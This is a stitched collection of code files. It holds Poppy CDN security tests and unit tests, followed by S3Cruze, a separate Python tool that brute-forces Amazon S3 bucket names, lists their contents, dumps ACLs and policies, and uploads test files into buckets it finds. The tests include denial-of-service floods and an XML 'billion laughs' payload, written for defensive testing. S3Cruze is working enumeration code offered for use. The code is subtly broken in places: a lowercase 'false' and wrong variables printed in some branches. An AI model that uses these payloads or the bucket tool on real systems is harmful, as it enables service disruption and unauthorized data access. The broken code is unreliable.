headers = {"X-Auth-Token": self.client.auth_token,
"X-Project-Id": self.client.project_id,
"Content-Encoding": "gzip"}
kwargs = {"headers": headers, "data": self.data_zip(attack_string)}
resp = self.client.create_service(service_name=self.service_name,
domain_list=self.domain_list,
origin_list=self.origin_list,
caching_list=self.caching_list,
flavor_id=self.flavor_id,
requestslib_kwargs=kwargs)
if 'location' in resp.headers:
self.service_url = resp.headers['location']
else:
self.service_url = ''
self.assertTrue(resp.status_code < 503)
@attrib.attr('security')
def test_dos_create_service_domain_list(self):
"""
Check whether it is possible to kill the application by
creating a service with huge list of domains.
"""
        # create a huge list of domains
self.reset_defaults()
for k in range(1, 30000):
self.domain_list.append({"domain": "w.t%s.com" % k})
# send MAX_ATTEMPTS requests
for k in range(1, self.MAX_ATTEMPTS):
self.service_name = str(uuid.uuid1())
self.check_one_request()
@attrib.attr('security')
def test_dos_create_service_origin_list(self):
"""
Check whether it is possible to kill the application by
creating a service with huge list of origins.
"""
        # create a huge list of origins
self.reset_defaults()
for k in range(1, 9000):
self.origin_list.append({"origin": "m%s.com" % k,
"port": 443,
"ssl": False,
"rules": [{"request_url": "/i.htm",
"name": "i"}]})
# send MAX_ATTEMPTS requests
for k in range(1, self.MAX_ATTEMPTS):
self.service_name = str(uuid.uuid1())
self.check_one_request()
@attrib.attr('security')
def test_dos_create_service_caching_list(self):
"""
Check whether it is possible to kill the application by
creating a service with huge list of caching.
"""
        # create a huge list of caching entries
self.reset_defaults()
for k in range(1, 16000):
self.caching_list.append({"name": "d%s" % k, "ttl": 3600,
"rules": [{"request_url": "/i.htm",
"name": "i"}]})
# send MAX_ATTEMPTS requests
for k in range(1, self.MAX_ATTEMPTS):
self.service_name = str(uuid.uuid1())
self.check_one_request()
@attrib.attr('security')
def test_dos_create_service_caching_list_rules(self):
"""
Check whether it is possible to kill the application by
        creating a service with a huge list of rules within the caching list.
"""
        # create a huge list of caching rules
self.reset_defaults()
for k in range(1, 15000):
self.caching_list[1]["rules"].append(
{"name": "i%s" % k,
"request_url": "/index.htm"})
# send MAX_ATTEMPTS requests
for k in range(1, self.MAX_ATTEMPTS):
self.service_name = str(uuid.uuid1())
self.check_one_request()
@attrib.attr('security')
def test_dos_list_service_huge_limit(self):
"""
Check whether it is possible to kill the application by
listing all services with a huge limit
"""
        # create a huge limit/marker string
attack_string = "1" * 3500
params = {"limit": attack_string, "marker": attack_string}
resp = self.client.list_services(param=params)
self.assertTrue(resp.status_code < 503)
@attrib.attr('security')
def test_dos_list_service_huge_junk(self):
"""
Check whether it is possible to kill the application by
listing all services with a huge junk parameter
"""
        # create a huge junk string
attack_string = "1" * 3500
params = {"junk": attack_string}
resp = self.client.list_services(param=params)
self.assertTrue(resp.status_code < 503)
def tearDown(self):
if self.test_config.generate_flavors:
self.client.delete_flavor(flavor_id=self.flavor_id)
super(TestDOSCreateService, self).tearDown()
```
#### File: security/services/test_patch_services.py
```python
import uuid
import ddt
from nose.plugins import attrib
from tests.api import providers
@ddt.ddt
class TestPatchService(providers.TestProviderBase):
"""Security Tests for possible vulnerablities
for patching calls."""
def setUp(self):
"""
Setup for the tests
"""
super(TestPatchService, self).setUp()
self.domain_list = [{"domain": "mywebsite%s.com" % str(uuid.uuid1())}]
self.origin_list = [{"origin": "mywebsite1.com",
"port": 443,
"ssl": False}]
self.caching_list = [{"name": "default", "ttl": 3600},
{"name": "home",
"ttl": 1200,
"rules": [{"name": "index",
"request_url": "/index.htm"}]}]
self.service_name = str(uuid.uuid1())
self.flavor_id = self.test_config.default_flavor
self.MAX_ATTEMPTS = 30
if self.test_config.generate_flavors:
# create the flavor
self.flavor_id = str(uuid.uuid1())
self.client.create_flavor(flavor_id=self.flavor_id,
provider_list=[{
"provider": "fastly",
"links": [{"href": "www.fastly.com",
"rel": "provider_url"}]}])
#create a service
resp = self.client.create_service(service_name=self.service_name,
domain_list=self.domain_list,
origin_list=self.origin_list,
caching_list=self.caching_list,
flavor_id=self.flavor_id)
        if 'location' in resp.headers:
            self.service_url = resp.headers['location']
        else:
            self.service_url = ''
def reset_defaults(self):
"""
Reset domain_list, origin_list, caching_list, service_name
and flavor_id to its default value.
"""
self.domain_list = [{"domain": "mywebsite%s.com" % str(uuid.uuid1())}]
self.origin_list = [{"origin": "mywebsite1.com",
"port": 443,
"ssl": False}]
self.caching_list = [{"name": "default", "ttl": 3600},
{"name": "home",
"ttl": 1200,
"rules": [{"name": "index",
"request_url": "/index.htm"}]}]
self.service_name = str(uuid.uuid1())
self.flavor_id = self.test_config.default_flavor
@attrib.attr('security2')
def test_patch_service_multiple_domains(self):
"""
        Repeatedly patch the service with additional domains and verify
        that the service can still be retrieved afterwards.
"""
for k in range(1, 2000):
domain_name = "replacemereplaceme%s.com" % str(uuid.uuid1())
test_data = []
for j in range(1, 2):
test_data.append(
{"op": "add",
"path": "/domains/-",
"value": {"domain": "%s%s" % (j, domain_name)}})
resp = self.client.patch_service(location=self.service_url,
request_body=test_data)
assert resp.status_code == 202
resp = self.client.get_service(location=self.service_url)
assert resp.status_code == 200
@attrib.attr('security')
def test_patch_service_multiple_domains_dos(self):
"""
Create a service and immediately patch the service with large
number of domains.
"""
for k in range(1, 100):
#create a service
self.domain_list = [{"domain":
"mywebsite%s.com" % str(uuid.uuid1())}]
resp = self.client.create_service(service_name=self.service_name,
domain_list=self.domain_list,
origin_list=self.origin_list,
caching_list=self.caching_list,
flavor_id=self.flavor_id)
if 'location' in resp.headers:
self.service_url = resp.headers['location']
domain_name = "replacemereplaceme%s.com" % str(uuid.uuid1())
test_data = []
for j in range(1, 60):
test_data.append(
{"op": "add",
"path": "/domains/-",
"value": {"domain": "%s%s" % (j, domain_name)}})
resp = self.client.patch_service(location=self.service_url,
request_body=test_data)
if resp.status_code == 400:
continue
resp = self.client.get_service(location=self.service_url)
assert resp.status_code < 500
@attrib.attr('security')
def test_patch_service_add_delete_dos(self):
"""
        Create a service and immediately patch it with interleaved
        add and remove domain operations.
"""
for k in range(1, 100):
#create a service
self.domain_list = [{"domain":
"mywebsite%s.com" % str(uuid.uuid1())}]
resp = self.client.create_service(service_name=self.service_name,
domain_list=self.domain_list,
origin_list=self.origin_list,
caching_list=self.caching_list,
flavor_id=self.flavor_id)
if 'location' in resp.headers:
self.service_url = resp.headers['location']
domain_name = "replacemereplaceme%s.com" % str(uuid.uuid1())
test_data = []
for j in range(1, 30):
test_data.append(
{"op": "add",
"path": "/domains/-",
"value": {"domain": "%s%s" % (j, domain_name)}})
test_data.append(
{"op": "remove",
"path": "/domains/%s" % j})
resp = self.client.patch_service(location=self.service_url,
request_body=test_data)
if resp.status_code == 400:
continue
resp = self.client.get_service(location=self.service_url)
assert resp.status_code < 500
@attrib.attr('security')
def test_patch_service_delete_domains_dos(self):
"""
        Create a service and immediately patch it with a large number
        of domain remove operations.
"""
for k in range(1, 100):
#create a service
self.domain_list = [{"domain":
"mywebsite%s.com" % str(uuid.uuid1())}]
resp = self.client.create_service(service_name=self.service_name,
domain_list=self.domain_list,
origin_list=self.origin_list,
caching_list=self.caching_list,
flavor_id=self.flavor_id)
if 'location' in resp.headers:
self.service_url = resp.headers['location']
domain_name = "replacemereplaceme%s.com" % str(uuid.uuid1())
test_data = []
for j in range(0, 60):
test_data.append(
{"op": "remove",
"path": "/domains/%s" % (-1 * j)})
resp = self.client.patch_service(location=self.service_url,
request_body=test_data)
if resp.status_code == 400:
continue
resp = self.client.get_service(location=self.service_url)
assert resp.status_code < 500
@attrib.attr('security1')
def test_patch_service_adding_origins_dos(self):
"""
Create a service and add lots of origins.
"""
for k in range(1, 100):
#create a service
self.domain_list = [{"domain":
"mywebsite%s.com" % str(uuid.uuid1())}]
resp = self.client.create_service(service_name=self.service_name,
domain_list=self.domain_list,
origin_list=self.origin_list,
caching_list=self.caching_list,
flavor_id=self.flavor_id)
if 'location' in resp.headers:
self.service_url = resp.headers['location']
test_data = []
for j in range(1, 60):
test_data.append(
{"op": "add",
"path": "/origins/%s" % j,
"value": {"origin": "1.2.3.4", "port": 80, "ssl": false,
"rules": [{"name": "origin",
"request_url": "/origin.htm"}]}})
resp = self.client.patch_service(location=self.service_url,
request_body=test_data)
if resp.status_code == 400:
continue
resp = self.client.get_service(location=self.service_url)
assert resp.status_code < 500
def tearDown(self):
if self.service_url != '':
self.client.delete_service(location=self.service_url)
if self.test_config.generate_flavors:
self.client.delete_flavor(flavor_id=self.flavor_id)
super(TestPatchService, self).tearDown()
```
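For reference, the JSON Patch documents these tests send can be built and inspected on their own. A small runnable sketch, with a placeholder domain name:

```python
import json


def add_domain_ops(base_domain, count):
    """Build 'add' operations that append domains to the service."""
    return [{'op': 'add',
             'path': '/domains/-',
             'value': {'domain': '%s%s' % (i, base_domain)}}
            for i in range(1, count + 1)]


def remove_domain_op(index):
    """Build a 'remove' operation targeting a domain by index."""
    return {'op': 'remove', 'path': '/domains/%s' % index}


patch_body = add_domain_ops('replaceme.example.com', 3) + [remove_domain_op(1)]
print(json.dumps(patch_body, indent=2))
```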
#### File: security/services/test_xml_services.py
```python
import uuid
import ddt
from nose.plugins import attrib
from tests.api import providers
import re
@ddt.ddt
class TestXMLService(providers.TestProviderBase):
"""Security Tests for any XML related Service vulnerablities"""
def setUp(self):
"""
Setup for the tests
"""
super(TestXMLService, self).setUp()
self.domain_list = [{"domain": "mywebsite.com"}]
self.origin_list = [{"origin": "mywebsite1.com",
"port": 443,
"ssl": False}]
self.caching_list = [{"name": "default", "ttl": 3600},
{"name": "home",
"ttl": 1200,
"rules": [{"name": "index",
"request_url": "/index.htm"}]}]
self.service_name = str(uuid.uuid1())
self.flavor_id = self.test_config.default_flavor
self.MAX_ATTEMPTS = 30
if self.test_config.generate_flavors:
# create the flavor
self.flavor_id = str(uuid.uuid1())
self.client.create_flavor(flavor_id=self.flavor_id,
provider_list=[{
"provider": "fastly",
"links": [{"href": "www.fastly.com",
"rel": "provider_url"}]}])
def reset_defaults(self):
"""
Reset domain_list, origin_list, caching_list, service_name
and flavor_id to its default value.
"""
self.domain_list = [{"domain": "mywebsite.com"}]
self.origin_list = [{"origin": "mywebsite1.com",
"port": 443,
"ssl": False}]
self.caching_list = [{"name": "default", "ttl": 3600},
{"name": "home",
"ttl": 1200,
"rules": [{"name": "index",
"request_url": "/index.htm"}]}]
self.service_name = str(uuid.uuid1())
self.flavor_id = self.test_config.default_flavor
@attrib.attr('security')
def test_xml_bomb_create_service(self):
"""
Check whether it is possible to kill the application by
creating a service using XML bomb.
"""
# replace content type with application/xml
headers = {"X-Auth-Token": self.client.auth_token,
"X-Project-Id": self.client.project_id,
"Content-Type": "application/xml"}
attack_string = """
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
"""
kwargs = {"headers": headers, "data": attack_string}
resp = self.client.create_service(service_name=self.service_name,
domain_list=self.domain_list,
origin_list=self.origin_list,
caching_list=self.caching_list,
flavor_id=self.flavor_id,
requestslib_kwargs=kwargs)
        # the XML payload must be rejected as invalid JSON
        self.assertEqual(resp.status_code, 400)
match = re.search("Invalid JSON string", resp.text)
self.assertTrue(match is not None)
def tearDown(self):
if self.test_config.generate_flavors:
self.client.delete_flavor(flavor_id=self.flavor_id)
super(TestXMLService, self).tearDown()
```
#### File: model/helpers/test_domain.py
```python
import ddt
from poppy.model.helpers import domain
from tests.unit import base
@ddt.ddt
class TestDomain(base.TestCase):
@ddt.unpack
@ddt.data({'domain_name': 'www.mydomain.com',
'changed_domain_name': 'www.changed-domain.com'},
{'domain_name': u'www.düsseldorf-Lörick.com',
'changed_domain_name': u'www.düsseldorf.com'
})
def test_domain(self, domain_name, changed_domain_name):
mydomain = domain.Domain(domain_name)
# test all properties
# domain
self.assertEqual(mydomain.domain, domain_name)
mydomain.domain = changed_domain_name
self.assertEqual(mydomain.domain, changed_domain_name)
my_other_domain = domain.Domain.init_from_dict({"domain": domain_name})
self.assertEqual(my_other_domain.domain, domain_name)
```
#### File: provider/akamai/test_services.py
```python
import json
import uuid
import ddt
import mock
from poppy.model.helpers import domain
from poppy.provider.akamai import services
from poppy.transport.pecan.models.request import service
from tests.unit import base
@ddt.ddt
class TestServices(base.TestCase):
@mock.patch(
'poppy.provider.akamai.services.ServiceController.policy_api_client')
@mock.patch(
'poppy.provider.akamai.services.ServiceController.ccu_api_client')
@mock.patch('poppy.provider.akamai.driver.CDNProvider')
    def setUp(self, mock_driver,
              mock_controller_ccu_api_client,
              mock_controller_policy_api_client):
super(TestServices, self).setUp()
self.driver = mock_driver()
self.driver.akamai_https_access_url_suffix = str(uuid.uuid1())
self.controller = services.ServiceController(self.driver)
@ddt.file_data('domains_list.json')
def test_classify_domains(self, domains_list):
domains_list = [domain.Domain(domain_s) for domain_s in domains_list]
c_domains_list = self.controller._classify_domains(domains_list)
        self.assertEqual(domains_list, c_domains_list,
                         'Domain list does not equal classified domain list')
@ddt.file_data('data_service.json')
def test_create_with_exception(self, service_json):
# ASSERTIONS
# create_service
service_obj = service.load_from_json(service_json)
self.controller.policy_api_client.put.side_effect = (
RuntimeError('Creating service failed.'))
resp = self.controller.create(service_obj)
self.assertIn('error', resp[self.driver.provider_name])
@ddt.file_data('data_service.json')
def test_create_with_4xx_return(self, service_json):
service_obj = service.load_from_json(service_json)
# test exception
self.controller.policy_api_client.put.return_value = mock.Mock(
status_code=400,
text='Some create service error happened'
)
resp = self.controller.create(service_obj)
self.assertIn('error', resp[self.driver.provider_name])
@ddt.file_data('data_service.json')
def test_create_with_multiple_domains(self, service_json):
service_obj = service.load_from_json(service_json)
self.controller.policy_api_client.put.return_value = mock.Mock(
status_code=200,
text='Put successful'
)
provider_responses = self.controller.create(service_obj)
for provider_name in provider_responses:
provider_response = provider_responses[provider_name]
num_of_domains = len(service_obj.domains)
num_of_links = len(provider_response['links'])
# make sure we have same number of domains and links
self.assertEqual(num_of_domains, num_of_links)
self.controller.policy_api_client.put.assert_called_once()
@ddt.file_data('data_service.json')
def test_create(self, service_json):
service_obj = service.load_from_json(service_json)
self.controller.policy_api_client.put.return_value = mock.Mock(
status_code=200,
text='Put successful'
)
self.controller.create(service_obj)
self.controller.policy_api_client.put.assert_called_once()
# make sure all the caching rules are processed
self.assertTrue(service_obj.caching == [])
def test_delete_with_exception(self):
provider_service_id = json.dumps([{'policy_name': str(uuid.uuid1()),
'protocol': 'http'}])
# test exception
exception = RuntimeError('ding')
self.controller.policy_api_client.delete.side_effect = exception
resp = self.controller.delete(provider_service_id)
self.assertIn('error', resp[self.driver.provider_name])
def test_delete_with_service_id_json_load_error(self):
# This should trigger a json.loads error
provider_service_id = None
resp = self.controller.delete(provider_service_id)
self.assertIn('error', resp[self.driver.provider_name])
def test_delete_with_4xx_return(self):
provider_service_id = json.dumps([{'policy_name': str(uuid.uuid1()),
'protocol': 'http'}])
# test exception
self.controller.policy_api_client.delete.return_value = mock.Mock(
status_code=400,
text='Some error happened'
)
resp = self.controller.delete(provider_service_id)
self.assertIn('error', resp[self.driver.provider_name])
def test_delete(self):
provider_service_id = json.dumps([{'policy_name': str(uuid.uuid1()),
'protocol': 'http'}])
self.controller.delete(provider_service_id)
self.controller.policy_api_client.delete.assert_called_once()
@ddt.file_data('data_update_service.json')
def test_update_with_get_error(self, service_json):
provider_service_id = json.dumps([{'policy_name': str(uuid.uuid1()),
'protocol': 'http'}])
controller = services.ServiceController(self.driver)
controller.policy_api_client.get.return_value = mock.Mock(
status_code=400,
text='Some get error happened'
)
controller.policy_api_client.put.return_value = mock.Mock(
status_code=200,
text='Put successful'
)
controller.policy_api_client.delete.return_value = mock.Mock(
status_code=200,
text='Delete successful'
)
service_obj = service.load_from_json(service_json)
resp = controller.update(
provider_service_id, service_obj, service_obj)
self.assertIn('error', resp[self.driver.provider_name])
@ddt.file_data('data_update_service.json')
def test_update_with_service_id_json_load_error(self, service_json):
# This should trigger a json.loads error
provider_service_id = None
service_obj = service.load_from_json(service_json)
resp = self.controller.update(
provider_service_id, service_obj, service_obj)
self.assertIn('error', resp[self.driver.provider_name])
@ddt.file_data('data_update_service.json')
def test_update(self, service_json):
provider_service_id = json.dumps([{'policy_name': str(uuid.uuid1()),
'protocol': 'http'}])
controller = services.ServiceController(self.driver)
controller.policy_api_client.get.return_value = mock.Mock(
status_code=200,
text=json.dumps(dict(rules=[]))
)
controller.policy_api_client.put.return_value = mock.Mock(
status_code=200,
text='Put successful'
)
controller.policy_api_client.delete.return_value = mock.Mock(
status_code=200,
text='Delete successful'
)
service_obj = service.load_from_json(service_json)
resp = controller.update(
provider_service_id, service_obj, service_obj)
self.assertIn('id', resp[self.driver.provider_name])
@ddt.file_data('data_update_service.json')
def test_update_with_domain_protocol_change(self, service_json):
provider_service_id = json.dumps([{'policy_name': "densely.sage.com",
'protocol': 'http'}])
controller = services.ServiceController(self.driver)
controller.policy_api_client.get.return_value = mock.Mock(
status_code=200,
text=json.dumps(dict(rules=[]))
)
controller.policy_api_client.put.return_value = mock.Mock(
status_code=200,
text='Put successful'
)
controller.policy_api_client.delete.return_value = mock.Mock(
status_code=200,
text='Delete successful'
)
service_obj = service.load_from_json(service_json)
resp = controller.update(
provider_service_id, service_obj, service_obj)
self.assertIn('id', resp[self.driver.provider_name])
def test_purge_all(self):
provider_service_id = json.dumps([{'policy_name': str(uuid.uuid1()),
'protocol': 'http'}])
controller = services.ServiceController(self.driver)
resp = controller.purge(provider_service_id, None)
self.assertIn('error', resp[self.driver.provider_name])
def test_purge_with_service_id_json_load_error(self):
provider_service_id = None
controller = services.ServiceController(self.driver)
resp = controller.purge(provider_service_id, None)
self.assertIn('error', resp[self.driver.provider_name])
def test_purge_with_ccu_exception(self):
provider_service_id = json.dumps([{'policy_name': str(uuid.uuid1()),
'protocol': 'http'}])
controller = services.ServiceController(self.driver)
controller.ccu_api_client.post.return_value = mock.Mock(
status_code=400,
text="purge request post failed"
)
resp = controller.purge(provider_service_id, '/img/abc.jpeg')
self.assertIn('error', resp[self.driver.provider_name])
def test_purge(self):
provider_service_id = json.dumps([{'policy_name': str(uuid.uuid1()),
'protocol': 'https'}])
controller = services.ServiceController(self.driver)
controller.ccu_api_client.post.return_value = mock.Mock(
status_code=201,
text="purge request post complete"
)
resp = controller.purge(provider_service_id, '/img/abc.jpeg')
self.assertIn('id', resp[self.driver.provider_name])
```
#### File: models/response/test_health.py
```python
import ddt
from poppy.common import util
from poppy.transport.pecan.models.response import health
from tests.unit import base
class TestDNSModel(base.TestCase):
def setUp(self):
super(TestDNSModel, self).setUp()
def test_dns_is_alive(self):
dns_model = health.DNSModel(True)
self.assertEqual('true', dns_model['online'])
def test_dns_is_not_alive(self):
dns_model = health.DNSModel(False)
self.assertEqual('false', dns_model['online'])
class TestStorageModel(base.TestCase):
def setUp(self):
super(TestStorageModel, self).setUp()
def test_storage_is_alive(self):
storage_model = health.StorageModel(True)
self.assertEqual('true', storage_model['online'])
def test_storage_is_not_alive(self):
storage_model = health.StorageModel(False)
self.assertEqual('false', storage_model['online'])
class TestProviderModel(base.TestCase):
def setUp(self):
super(TestProviderModel, self).setUp()
def test_provider_is_alive(self):
provider_model = health.ProviderModel(True)
self.assertEqual('true', provider_model['online'])
def test_provider_is_not_alive(self):
provider_model = health.ProviderModel(False)
self.assertEqual('false', provider_model['online'])
@ddt.ddt
class TestHealthModel(base.TestCase):
def setUp(self):
super(TestHealthModel, self).setUp()
self.mock_controller = util.dict2obj(
{'base_url': 'https://www.poppycdn.io/'})
@ddt.file_data('health_map.json')
def test_health(self, health_map):
health_model = health.HealthModel(self.mock_controller, health_map)
storage_name = health_map['storage']['storage_name']
self.assertEqual('true',
health_model['storage'][storage_name]['online'])
dns_name = health_map['dns']['dns_name']
self.assertEqual('true',
health_model['dns'][dns_name]['online'])
@ddt.file_data('health_map_dns_not_available.json')
def test_health_dns_not_available(self, health_map):
health_model = health.HealthModel(self.mock_controller, health_map)
dns_name = health_map['dns']['dns_name']
self.assertEqual('false',
health_model['dns'][dns_name]['online'])
@ddt.file_data('health_map_storage_not_available.json')
def test_health_storage_not_available(self, health_map):
health_model = health.HealthModel(self.mock_controller, health_map)
storage_name = health_map['storage']['storage_name']
self.assertEqual('false',
health_model['storage'][storage_name]['online'])
@ddt.file_data('health_map_provider_not_available.json')
def test_health_provider_not_available(self, health_map):
health_model = health.HealthModel(self.mock_controller, health_map)
providers = health_map['providers']
for provider in providers:
provider_name = provider['provider_name']
provider_is_alive = provider['is_alive']
provider_model = health_model['providers'][provider_name]
if provider_is_alive:
self.assertEqual('true', provider_model['online'])
else:
self.assertEqual('false', provider_model['online'])
``` |
{
"source": "JR0ch17/S3Cruze",
"score": 3
} |
#### File: JR0ch17/S3Cruze/s3cruze.py
```python
print """\033[033m
____ ____ _____
/ ___|___ / ____ _ __ _ _ /__ /_____
\___ \ |_ \| __|| '__|| | | | / /| ____|
___) ___) | |__ | | | |_| | / /_ | ____|
|____/____/|____||_| \__,_|/____/|_____|
Release v1.3
By @JR0ch17\033[0m
"""
import sys, os, commands, requests
from argparse import ArgumentParser
from random import randrange
randomNumber = randrange(100000, 999999)
uploadFile = "BugBounty-%s.txt" % randomNumber
inputFile = ""
targetBucket = ""
upload = ""
delete = ""
def wordMixing(target, word):
wordList = ["{0}{1}".format(target, word)]
wordList.append("{0}-{1}".format(target, word))
wordList.append("{1}-{0}".format(target, word))
wordList.append("{1}{0}".format(target, word))
return wordList
parser = ArgumentParser()
group = parser.add_mutually_exclusive_group(required=True)
parser.add_argument("-t", "--target", dest="targetBucket", help="Select a target bucket name (e.g. 'shopify')", metavar="targetBucket", required="True")
parser.add_argument("-f", "--file", dest="inputFile", help="Select a bucket brute-forcing file (default: bucket-names.txt)", default="bucket-names.txt", metavar="inputFile")
parser.add_argument("-u", "--upload", dest="upload", help="File to upload will be automatically generated (e.g. 'BugBounty-[######].txt')", default=False, action="store_true")
parser.add_argument("-d", "--delete", dest="delete", help="Delete file from bucket after uploading it", default=False, action="store_true")
parser.add_argument("-a", "--acl", dest="acl", help="View bucket ACL", default=False, action="store_true")
parser.add_argument("-p", "--policy", dest="policy", help="View bucket policy", default=False, action="store_true")
parser.add_argument("-c", "--cors", dest="cors", help="View bucket CORS configuration", default=False, action="store_true")
parser.add_argument("-r", "--replication", dest="replication", help="View bucket replication configuration", default=False, action="store_true")
parser.add_argument("-w", "--website", dest="website", help="View bucket website configuration", default=False, action="store_true")
parser.add_argument("-l", "--location", dest="location", help="View bucket location", default=False, action="store_true")
parser.add_argument("--all", dest="all", help="View all bucket configuration", default=False, action="store_true")
group.add_argument("-b", "--bruteforce", dest="bruteforce", help="Bruteforce buckets names. By default it will try to list files from the buckets.", default=False, action="store_true")
group.add_argument("-s", "--single", dest="single", help="Check a single bucket only", default=False, action="store_true")
args = parser.parse_args()
with open(args.inputFile, 'r') as f:
bucketName = [line.strip() for line in f]
lineCount = len(bucketName)
if args.bruteforce:
print "\n [+] Building word list... please be patient :)"
for name in bucketName:
wordList = wordMixing(args.targetBucket, name)
for word in wordList:
r = requests.head("http://%s.s3.amazonaws.com" % (word))
if r.status_code != 404 and r.status_code != 503:
print "\n [+] Checking potential match: %s --> %s." % (word, r.status_code)
ls = commands.getoutput("/usr/bin/aws s3 ls s3://%s" % (word))
print "%s" % (ls)
if args.all:
print "[+] Checking %s bucket configuration." % (word)
acl = commands.getoutput("/usr/bin/aws s3api get-bucket-acl --bucket %s" % (word))
policy = commands.getoutput("/usr/bin/aws s3api get-bucket-policy --bucket %s" % (word))
cors = commands.getoutput("/usr/bin/aws s3api get-bucket-cors --bucket %s" % (word))
replication = commands.getoutput("/usr/bin/aws s3api get-bucket-replication --bucket %s" % (word))
website = commands.getoutput("/usr/bin/aws s3api get-bucket-website --bucket %s" % (word))
location = commands.getoutput("/usr/bin/aws s3api get-bucket-location --bucket %s" % (word))
print "%s %s %s %s %s %s"% (acl, policy, cors, replication, website, location)
else:
sys.stdout.write('')
if args.acl:
print "[+] Checking %s bucket ACL." % (word)
acl = commands.getoutput("/usr/bin/aws s3api get-bucket-acl --bucket %s" % (word))
print "%s \n" % (acl)
else:
sys.stdout.write('')
if args.policy:
print "[+] Checking %s bucket policy." % (word)
policy = commands.getoutput("/usr/bin/aws s3api get-bucket-policy --bucket %s" % (word))
print "%s \n" % (acl)
else:
sys.stdout.write('')
if args.cors:
print "[+] Checking %s bucket CORS configuration." % (word)
cors = commands.getoutput("/usr/bin/aws s3api get-bucket-cors --bucket %s" % (word))
print "%s \n" % (acl)
else:
sys.stdout.write('')
if args.replication:
print "[+] Checking %s bucket replication configuration." % (word)
replication = commands.getoutput("/usr/bin/aws s3api get-bucket-replication --bucket %s" % (word))
print "%s \n" % (replication)
else:
sys.stdout.write('')
if args.website:
print "[+] Checking %s bucket website configuration." % (word)
website = commands.getoutput("/usr/bin/aws s3api get-bucket-website --bucket %s" % (word))
print "%s \n" % (website)
else:
sys.stdout.write('')
if args.location:
print "[+] Checking %s bucket location." % (word)
location = commands.getoutput("/usr/bin/aws s3api get-bucket-location --bucket %s" % (word))
print "%s \n" % (location)
else:
sys.stdout.write('')
if args.upload:
file = open(uploadFile, 'w+')
file.write("This is a file upload test for bug bounty purposes")
file.close()
print "[+] Uploading file: %s." % (uploadFile)
cp = commands.getoutput("/usr/bin/aws s3 cp %s s3://%s" % (uploadFile, word))
print "%s \n" % (cp)
if args.delete:
print "[+] Delete file: %s." % (uploadFile)
rm = commands.getoutput("/usr/bin/aws s3 rm s3://%s/%s" % (word, uploadFile))
print "%s \n" % (rm)
os.remove("%s" % (uploadFile))
else:
sys.stdout.write('')
else:
sys.stdout.write('')
else:
sys.stdout.write('')
if args.single:
print "\n [+] Listing files for %s." % (args.targetBucket)
ls = commands.getoutput("/usr/bin/aws s3 ls s3://%s" % (args.targetBucket))
print ls
if args.all:
print "[+] Checking %s bucket configuration." % (args.targetBucket)
acl = commands.getoutput("/usr/bin/aws s3api get-bucket-acl --bucket %s" % (args.targetBucket))
policy = commands.getoutput("/usr/bin/aws s3api get-bucket-policy --bucket %s" % (args.targetBucket))
cors = commands.getoutput("/usr/bin/aws s3api get-bucket-cors --bucket %s" % (args.targetBucket))
replication = commands.getoutput("/usr/bin/aws s3api get-bucket-replication --bucket %s" % (args.targetBucket))
website = commands.getoutput("/usr/bin/aws s3api get-bucket-website --bucket %s" % (args.targetBucket))
location = commands.getoutput("/usr/bin/aws s3api get-bucket-location --bucket %s" % (args.targetBucket))
print "%s %s %s %s %s %s" % (acl, policy, cors, replication, website, location)
else:
sys.stdout.write('')
if args.acl:
print "[+] Checking %s bucket ACL." % (args.targetBucket)
acl = commands.getoutput("/usr/bin/aws s3api get-bucket-acl --bucket %s" % (args.targetBucket))
print "%s" % (acl)
else:
sys.stdout.write('')
if args.policy:
print "[+] Checking %s bucket policy." % (args.targetBucket)
policy = commands.getoutput("/usr/bin/aws s3api get-bucket-policy --bucket %s" % (args.targetBucket))
print "%s" % (policy)
else:
sys.stdout.write('')
if args.cors:
print "[+] Checking %s bucket CORS configuration." % (args.targetBucket)
cors = commands.getoutput("/usr/bin/aws s3api get-bucket-cors --bucket %s" % (args.targetBucket))
print "%s" % (cors)
else:
sys.stdout.write('')
if args.replication:
print "[+] Checking %s bucket replication configuration." % (args.targetBucket)
replication = commands.getoutput("/usr/bin/aws s3api get-bucket-replication --bucket %s" % (args.targetBucket))
print "%s" % (replication)
else:
sys.stdout.write('')
if args.website:
print "[+] Checking %s bucket website configuration." % (args.targetBucket)
website = commands.getoutput("/usr/bin/aws s3api get-bucket-website --bucket %s" % (args.targetBucket))
print "%s" % (website)
else:
sys.stdout.write('')
if args.location:
print "[+] Checking %s bucket website configuration." % (args.targetBucket)
location = commands.getoutput("/usr/bin/aws s3api get-bucket-location --bucket %s" % (args.targetBucket))
print "%s" % (location)
else:
sys.stdout.write('')
if args.upload:
file = open(uploadFile, 'w+')
file.write("This is a file upload test for bug bounty purposes")
file.close()
print "[+] Uploading file: %s." % (uploadFile)
cp = commands.getoutput("/usr/bin/aws s3 cp %s s3://%s" % (uploadFile, args.targetBucket))
print "%s \n" % (cp)
if args.delete:
print "[+] Delete file: %s." % (uploadFile)
rm = commands.getoutput("/usr/bin/aws s3 rm s3://%s/%s" % (args.targetBucket, uploadFile))
print "%s \n" % (rm)
os.remove("%s" % (uploadFile))
else:
sys.stdout.write('')
else:
sys.stdout.write('')
else:
sys.stdout.write('')
print "\n \033[033m[*] S3Cruze is now complete on %s.\033[0m" % (args.targetBucket)
``` |
